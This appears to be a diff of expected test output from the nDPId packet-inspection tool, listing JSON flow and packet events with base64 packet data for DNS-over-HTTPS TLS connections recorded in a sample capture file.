+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946739312226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6JAADYGLgJ0y7P4CgAAAQG7ovhHE0lUaJwjAlAQAfWSIAAAFgMDAHoCAAB2AwPlxRfYXMEhZdQ8ajfb6CRVs1xCMiaZqVFxrCKnBSpfMSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFxMBAAAuACsAAgMEADMAJAAdACC7U5tcN1lyGmU4zwJoCO50vCXYPM\/QvTMxioFdnZMwahQDAwABARcDAwAgWYRxXowUwkrzaVinqnzWcQ+TBbMUOwCXts50ql211fAXAwMLXdNQugGPXsJ\/8C6qtHlVybUGs7I40LMTA5OhGA+5YDHeNrEuEhv+tu5lin4eHBImQq4kbeHEAo3aNZo3KmURuDQDW8qwTnUEVfBOev0Cp\/PjSdjbD78ol0y5nY2oRm2fbsKHJzJSSjb0AciAo1LrQOgCF2CvMV+eyOyHUYct\/0CZzYMkLxKZwgRjyAJuXMfA4yEKZGM2df01\/BUbSo1Rl+1vGFFUkgKmIgKkRy+Bl\/5\/aUS0H7x+NZdUl10aLbTaEzyxHvC5FKjKyKio8Nq1FnOONx6t6a1NxwFwus79kTDzOhi2RBBAptjB5bREXvI7I78ofmPnYWckOqrJFFwvKuiJMXscIR8meUqP2LfgWzMDMhsH4p0jN+l3Gq+FBdoxKNoG26O484i0pfOfynG5VCfFmeEmq9XB2jrTV2FwEB1w6FHC1GMZVEK60qV4O+pPgrZRJMZSzwllOfjef8V42EZAcff6ioa4KXyU2Lg36HO0yhYzbeNUU3pAi5\/qwo\/8uuPNfVbKx0eipCjwx5+0hZa74DG\/pD0GzntSqS7YWEdlhEup1mtZmQo0eaDjwGNrCt+ZhJgQy3V2hPBCa6ygW9VMF25ycsILPfVx1AuqPxUOHW4j094S0MBQegEN0J3yWeWaiiBlzmaP9zyQI2IatrzAzhNsYChDHK+csfeO9ThoioAfgwS3AljMljsUX8LckrIXpurphG9MTttyGcbyuYOZgMBCh0hvfGempBEWQ87aRGnYict7DJMJ4ANT6I8mIRYfs9ktyEUtlVvr4PQNKARgob1jc7dcCzVhF1wheYyQGYeS88ndMehrocaatcfPAW+sGsd\/PlwCwZjCKZRZc+RY8UIBMVVQFkJfKmd3vMc6ZdNW+eECwipaKd\/GGSBQQLLSZMZlc2\/fq5kgX+ANS93WhwsRG1d13Nrw0y\/ATREqmOdYnxg9NReWvH6Y9oKaWK0ORmDf6ge12lS9oVHWz42D+xzkGejOSsWciqHXAH+yg6krTEDYRK\/FPbGud1EfOntNRDB8fuTqg6A3gnOVkf5Fe+6Udnrmytaz7VKwjYRLdi7vz2qagJMVcAAVeEuovh5FOb\/1EXijxsxUB7j\/jcKgZC3AwFJv0DQSdWi57X+9030WJdNzGWfONsJDey166z5gtgIr0gWE3XSAHs3+JszFzgP3FC9xVilACKjY2RhRQyvT6fGwve0GSnMhLdXxdeZ6r4BSk1XrmYwxLzeXAWqaNfsfk0zirnPcN6UG26k3lnJ6hvodPS8WtfbDlmo8y38gK+0yMKaENYnpsWQ48t8ZDpKCeCokx5kJ4EaYicnC8gtp5emEtPLOmyhRS\/Kx67Xu26y0PrFyj7Ld8XnP+XpwQqAHuqyPPLcA7ULfoMWkppyHnn9L21Mz+6Ml1h7gnl\/ZwxToT4wqDJUExA47\/9+7Gr\/oh5kj8z6qG0LWqBHYWfEqQZ9C6c64n2xAiBIjVtW2HmMJDocq5nLsWLSEY96ngephvH\/r2i4gA320QycCOlUbe7IShXjhfHajvNFk9aT9mVr+xKfGAIJr4upUShXmjRDRgxjZ9A2ryxbqx35tiU7DJrZpjO\/5DMzEBxvVggb2jlqmTLhZH4TtJi6zfeCLrUu+11tfn0GJzj4HRmOyvzdz8MwTSgWBVisogZKhAqzzkq5ai5YnEcmNOW52YkN74XGWlccUSq2JFZXF"}
-00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946739312226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6NAADYGLgF0y7P4CgAAAQG7ovhHE08AaJwjAlAYAfWhygAAp6lKTcn83BQxpQ2W+POQkJxpRZXfacCT49dCzRTmvnt7\/eMDX1qsnmxcn8IW\/\/jaiVs0n6JrCEPqM3KpB310Ezncm8MGw7ZSfjBA5NhRsYZd6g\/lnjS76Li5236Ye\/OssNOz\/mjZ3Pxtb9lckb\/iUUI\/CTV\/O+8693wmOcz\/ttlVvcsf2F2cDnHv69Z9ZcBThvWSK1Fyp8msppNqA2rjumUxHY0NG8Y6Cz7YUFXsrxgVnCyIlXLFSqfPySagEMAo+BwG8r0qoeYlZ+taxtjBF+CPFNBs5wvSzuudNsLZAlsoLeVbC7V4nVAvK0ZozwjUaQXydZ7If0bf1gWwEwbOWvwXqAGoH05iR0Faj+nrSPK0l15jvP1ksCKE\/mIp4VHggNWOkJSAoQLhJ7eDNcolNe3VlYAesuTAoWHjzA4h2mXXEBGcexNswvAECexp5rG8zj4HDx39qgDVWk3o0eoSeBD1Uedt57E3iKOheQuYjuGPkNLW\/CT1EKc1xsQFJaPuXeJntSsuTJIbn\/JmjGMrhs2EpgTuc4i6KbgNr+Dg8naPJNChEcAoURckVZ0QP1tlwwQ3au79pUNst+WdCcPkSU8h2p+dgHNltfLpGpzxtjAkiMDwJHlE7uKJfM3Jooj+j8pbChIDWDckUBPBe4tCMPlI9VbP7p8jHCN+Jbgx\/vlzb\/jhrZ3VmwNp1ed4spIYgJkRtqvwQ8Z+wh5eYA\/rsAfAyJTWCHM70B9AefRgCTo9QDWJRLYx1cy2\/Boia47DDoYb3uBS7QfII4eh4Kp0F4K7dkOLwQWThipleT\/tvJB91q4YO69guoqAikyr2u0R4I\/dsfO61jRS\/0OGcoHRfzyYT6Gw0389lH9EFy84qx0Src85OaD1tRwt6pfR9awywt5CBZe04hE0tSwRbw55PNLODVlESQS0e66OA\/M16o1ABO7aMZrc1JmwD6a7e6weEeFmAazedN8hZmlYv1tms5VSBekoNgGF0CPdRNH7+BWQQ\/oy6wbYcn9T8DbY3EESV3ngHV5p7hWwxUALrbhEOn\/rgSRIuWBulfZWiwjpGLHCmd25Lp9PvWu2ARh3jmQWx3LqaLBWQZ2RO9BztLQCxX\/fKF1FJ2Nxx5CvAx1deQyJI3ILd0FX\/RREt+JafDB83Cz6gQe6DiXexfTUxaiReu6RStMeEaz6P71JkxtuCl0MQOV+trcnTBAsrOiC0Pnp41ddFZ9LyjPw5Mwgkq5S8GDPbsUHU26OG2nr4C2Qc8pral7heokrRYgBHlPnskyAlkCxuL+0XPLYLPIRRcJ64nRekoDw2yg6gDPsz4RcMVRLhEiIfkrCTlBJmmDuRqLpZJpecdlBmRfFHNMXGB8i+H\/\/tNPFLdJAZryXO\/8h5nkH4Mq7yLQ6vkIR62sgbVPD0Qe836LfCEQO\/hxA9iWtbqSJ07ScNvoG2Czrtvhfwq400gs5KtFeBbk1AFnMyczsxPdl6tp142MbR3VLQmj78nlxilK51hORcVLi9ktXxGEonuDfod4vDjaA3pJ\/0ADkZjstpvA2GHymd+GbXXXQzsOxrlPNaHDKM7gA5XeYsGBeDXesqay1VJZXsBwjzKmLHBEfMmuTQkRGywy3RBFrIumMzi24aTghRx9FA\/ZPDZtgNyArr3TSzkQB\/WYB0FDxqBDH7pfBnH8cJXOSx4GfComMuGBhw8lB8S7RS+Tun6aoozaQ7NOXFkWLUNwlMATJg\/u88xBUir9H293nJp613ia6G8KaLtsNZhb97810Q6p5rpfzJ8sEbxPvnOBsJoN2uNaptS39DLNaJ78nP1N\/6JenLJUIebOzoNXR4wfNgVp5Coyyjw8dfCFDyuNA5Oi18AcVmGaGj7TK82vR9gQ2IWuTm0sTMl0T1RNelk87ZLC7oqgqi01091WCo6H3\/T5HgzDHHgrz3hvSk8s9"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739317842,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"ts_msec":946739317842,"pkt":"REREREREZmZmZmZmCABFAAFDy\/NAAL0GDsoKAAABwx5eHOp6AbvJsoUZMUH8QlAYAfbjLAAAFgMBARYBAAESAwOCYT7eCU1xUXbhTPV2JlKPIHcY7sPH2WwKtpwnSeF8xyAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmZmbXVjLm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAw+TAbBBMqcOYtJZmoA1qcBE16Yt0ym3XOBLcMkrVpDQ=="}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739317868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739317868,"pkt":"ZmZmZmZmRERERERECABFAAuAyWFAADgGjB\/DHl4cCgAAAQG76noxQfxCybKGNFAQAfXtaQAAFgMDAHoCAAB2AwNkyl8ogzMlAhTUQA2TsMh7Q0Cc2\/3wZHCiwad1Z9NoaCAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9BMCAAAuACsAAgMEADMAJAAdACD+8H0HbVGEEmZC5hZLdNizcuC\/0pRP3fgeIP4D\/GwhdRQDAwABARcDAwAkfwnuX6wEOZOBUTjar1eVwNX\/5E0Ocx7Di9qIEnerial2sCiHFwMDDDWV4W2nvLW+\/N2l4x6sJgc8wiYdu5HOhM21Gm3mnFcxKO2Ie6ZC8TBNY2Mpp7Yb5rcL6bqv3cZKl4w3lzpNGDKGTjZnaTdTckz2Zj9T\/bsrBq0FYycXELwNiLo2fX1zTKtRPyLUu0GGauan4AQwcaDjRQzNlNJGd6461bdar1412MhrLksAOF3Zz32PJXTXtFU1mwvYVqphcZDb4pPZ0N+gjj7dNR4S3YwPGEbwlcx1UcGfiv3pyH+UUZNMH5Baw9z+5KY9RTPE3Rfw1bhKsm9xadHFb6suVuYDZzfowFS+\/J7rFZVNyczZA\/78zcdYuuXbTxeDjPhOqxAoQDX7VF1HojbcFFzFMGuyikHPdDYckD+WeR5lbhzc\/IDh75MNMf\/KMikRmHFGsWSPgCfnHcJinGKvxJJW58RraOB\/5irkT41Kj2mTP7rHD5SNd2CjxOxspgfL21g9EgRySSvXC+1MOm1qzwLgfjx1ZGRqf62CTxE1WBGLSGVSBUD0U9VUbvm7X5SNczaQPf0VLn8L3p7i1Ks07MNKvx2UZUXfrd\/RU2JWlAdhuGfs4RK7IYupZ9gwETRs4hxHaE\/JmiH23lQ8LvM6OtMsbQ6PirB\/Qq+igXuyD0TY3sAc4gdxm+SJGHsDpdSKgD9SodG\/vExsIGp+Gl5tevJKVwUT0pGU9EjX1Bi1e0B1xZ5ye5cjD8jxqC6fGWDYbc0qUQnT6Ei3AwoDVwqGAF6EPjjKHUKSNJDHKDRweWDMJ8eQeivUqlu+lhWhCAE9lUvj8qFKlloewows6Y7yqVUmSPPw60JQ\/7KRplxJ3xUWU3++WylOr+8YCwNo64NgMLldroBbTf3wwNL5K2B8K2fa0ar2Xxz3JO0bcvkksssiMRLPicETirp6CaB0jh\/JBv+EtfNF9XlRRV3bVxTCpp5g2WrRk6UQuYXfLZgXXpvWsW3UQwQvcMLuqGRqk0Lrq45fax67cEa4ablkdoldX6BJdVjUPEVJmY\/4EAB6c5ffE2gmcKP798gpjRuEOsJHx7lU8XAha86w59XzXonwVhFiFEiku0\/ryBztip397enoLu3d\/DdWuO13MC2xztCFDC63o+OIx4LKccR2dUluAwyjMQHJH2QfKyLnH3gJwChS1jbNN6JjmBlIjJ5F5oE0c\/LLe7ZNRcNl04\/gPLP3X4Ig1u++FkuVZR4VffxYIDiKTeCsRjSq8xT0sFQrVMRqRExsxUpTFlLjgmk+4A5gz+AWsHQgXQDHpc8q+tpaaLw2T\/VxrMhaAlTNwD0R+fPu6xqKcmZ7K4tPJ18rUG2cCEq2Vyx\/nZ5Bsb4X51YWHYwI\/b62OL85Ky892\/YpuTiyCwr\/n7zKZjbYHc3bE3kJITVYYhhm7SCsQwZLdboBPXK1hc5zPXoZ51+dKsAS5jlTrL7t90UaX+3d5RBjR5yWI+hwkpRHZC4YPu4wFBj9CS+kKkAjOdshMO3DBnfsoKT51IiDooH56PULR9jXPjPvXwHziEAOD5lKZLhl\/1PpgUaU+m0Qhb9DGdPkvd5L5MtmeN6AG3ojp00pWioyce1OEa+lwCX86DDB4V50XA8WSmUf8Ruv9dDKOkEto48W94o6jbWCBaVHLa30AI1sBDsLlVma26j5oIbiMjlGK8ArsP5ukW3ec2Ucyyw4OeOhYe4PTq7O8QJdyRJffrasJ10uS+VJlhZE6nntiGTZcHenBLx6mVY\/sNy\/xKxBzOkMpSKdjL8GC01HDHp6JDU\/ZHpm00Le70fm6tFZ9vCb5wPUsyYycjMTWmiSgMdLOaewpU9tlODZTwi8DEVWJyEa6fkCFWYdu3u0ydeu8NzIOlQcZ1lyy\/E5qNM0pqUIMKgu+I5sA\/1d+JmmvGoRZQYTQTUa3kxoSS7rPzyV28dHyfYsyZ6xH4xX0Te4M4ymNWY+c\/L9THfsDN\/oVSD593mlv7UAAlNYa3xzFv8UKd\/o0wqF1apADEX5sol\/96BK9yt++kADu5RkL3Q9suLz5lPpANm2QRRIs8Ow+4yzU\/7qCzwe3wQndBdO2mvPNrxNQWX0RWtNADT1hADdzQX8UO24dOXh4qk+iHH6bl8lfIvW8+qqcF2nRbvY6bMLSrGQokwAzcMtwiZdjIJEsFZPEIqPD7EZnzjfnQijrIF9Wn4vbTwPzBnADd1msbtKeSaVNdMJih6KLod12TaeDOeCDRiB61IfXV9dgIKfGFyMlxjk0+d6Grs+cJ7UQzYlQ0mX0vg3on5LNDK23JzvxJlO9RApmtXu0TOUl67cxwpSzAdhxbWvI8l0V4Ai4I3tdYPelpVFVsSo+cgXM3bWISOOqQjzDzqnRV3rpFOpKmYj18yo6Iw3eQgPQrdVloO5tfEf2RUtUbOK+ineibqkTHcOjvhuseYK31qZJs+iTw0+voLfLVtqWLppBhUR5ajc3xYiWsGOK3UP0Zb+9tGTDp7eUX5mpFIs5TGNFA+qxq204tT5KujsIYtCIDdSXn6JYPAXRTlwA4oEjKa3OoGb33tMMT9hVxCQHDLFOs45v41USfRH5jGOfkuc9t77jPR84y7jSr8tXiXsE5CuwKv3P7uF9BVlABkx3ZlxEIz4\/1UR7mzFGAx9K\/RIDlF6SxU6mh73+mMXE0JVkoSTGdIPiDILMtKbfWz72\/UvSW7dTt35fwXmnQwL7He\/RlLL0\/sjJ8vBxcVsv7+Y0XxXaeqzhRtNiCnRgUcTqfLUOJS8aBbh4HPdSKkdltzZb\/S5Lper3Z8zxxuZkIif3ZJ\/gz\/T0iQbX6Et9RMROBoUHjPg5pKYqkENDxoMG\/MC0WVGiX5R06OFe3s9dZ\/ozvLZvYcEZE7N7F5n9sPRwd+I+59lPh72uicIxFdChXuEOxCFU0V3rGzpol1Y\/VsMpTxsDCKvlfGj6qXugNMGkxmq51kciXtj75pUlzwIMe6kQUn2jTFnukdp6OPxrp0T4\/lDiC3VaK0fB4xi6LdOz\/EwCzEu7lICtRLOOwfKoiPsMnC\/K4Myo47r7qgooc6Dyct7xyGHbGYJon8e+PQMECksrlAXwIcA8LQoEysxirtgk51VSp5RdhUCampTO83NLVIjW6\/5AUld9ViiwVRqzLBg7wtcqkBPZd3uqzxG5sC5MeKaDzMg3QKygjiklub6zdiCWJK8V5PVpgiHBa0as\/kw\/NbzRIp8\/DH7U1o9eDK98CHzu8jiLgQ5n1w2IYkMJA1JpBIvlpsoUz6Qe08g4O6AzxZi5RyC6\/8K7\/Ed0NrDjr+G1S6iNZ+qijE4QRaBke9Co9IWob47jnSAaxgFwziKOB2hnQn493UlWhwDwQZuENq4DusUKLl4gaZTo1LvBrcu9EW+pZ0sdlBNW+e5bo09BfXSYhwTQVczSoVWspRueOrFVGx29DRpvDMWXSToev+\/5dhguN8sE7\/6r6UStt1tBEq6JkIdV7o\/cGVmADZ9PpG+uKpSV95fJQxwhEgMidjt9Nuj7TkbtLKuomHY1OGt2HlKFszmF624Ixr0UPZ7oS0P3i\/BbBVqEJdJZsiVw4MhJvqQMjH63aJ9Ie4EL24xwrBjLm1YPTGhWjPxzGPCBhmgSj9u3DHYv7ANgf\/CwtQN4PY6wBmanZg8AFnKkxZzdFSDH5pdfVl85gHQh72n"}
-00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 01477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946739317869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"ts_msec":946739317869,"pkt":"ZmZmZmZmRERERERECABFAAMgyWNAADgGlH3DHl4cCgAAAQG76noxQgeaybKGNFAYAfV6GQAACB\/j9FRzrXDeV1gMTvdtnDbaxVBoJBh9cy8pOcYrD8iqnoIgGbCFSCgUCuevEmCLqMD6ndxwNBjeWxvehtGcTzYfxO5MsUhftQ0+dqR1WhFRhDtmvuIG3Q\/1JnJ+iTTGKy7+d19ANVD5kJS2Kbw1kq1CCeKCETSjOhUhw85xD38cYnUuHGOyMgN3a57KOUyOmb4EwXoByM8BsVlxu1vc1oPozugCeie0GDWpbdeaEmjgROEgR6DsCHE32e8OUOXMw3\/fTV5lRZlHvoE+WIdAJO23JksMoSbzH5lXNpwBfPg5fllHB2gzZy73MltgSTbtU05NdkOcr1ZFoqdQ2V7wBDgCUult1m1frKnm9RbG5so0kMdI1K2imdVR2omx+E2ZIA0aLFwNHZ87uVzv\/27AUYdBTlcNoD9yJPyo52+VSIEhFJ+iC6HMt6T8vMgHE9t8doC6zzQ5PPfhV0Y\/wHOciEZ1QCJawdjeaWA1oK+LH3dEkeN+2N6ZvT6aGJRirsBAqqpY1jcHkYSWOu0YNfkmmhcDAwEZhRt19HF8btCDpTYJhT082yjULJw4KauCEpxSogJCDv0wIm\/nxsgKWJ5swMbqyuXpT7mdSSff3VOjrgPc6f4pSWMC0gPkidij6lKAHSShm5G9hfxPyAE5LFfSUSjOyv6KeU3qvvH\/y9kOCN3ZJI34MmNCSHjx7F7SwgBhT+XBQWcGdTlLW08ufWjBpFEV0wweQ+sorOCpyYk1BQhN7aPpwW+8cPmzhDQyCikmnIgsWh1OdzHEfXqnhQmoNEJoF7iPcZZ2Q5XdXc7TB5Nr97MOlFTANPGwh+Z0IQ0oeyTOBC76R3rCyPcgQuUbw2ZmngRvKZCro22Tf+lTL3RL8Wypoy8hNNZMukYZOxZV3pu1hHfTdtt5At2T9yMXAwMARRSoalzVajpzS8ANj2fKvjjGfm\/L7CaKj2s8TbmN14sqePDJ6R8MH8TM+nnzmnQKkuZgpCVkmHfyoZtoN5aVAw1RpWQU5w=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739336955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"ts_msec":946739336955,"pkt":"REREREREZmZmZmZmCABFAAFEM0dAAL0Go94KAAABuelq6LZCAbsgVVLXybMJllAYAfbmxAAAFgMBARcBAAETAwMcr1WdeadOHog3lEpiodEeAcm2gZJgU0L8O6YStA7tWSAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLmRuc2hvbWUuZGUA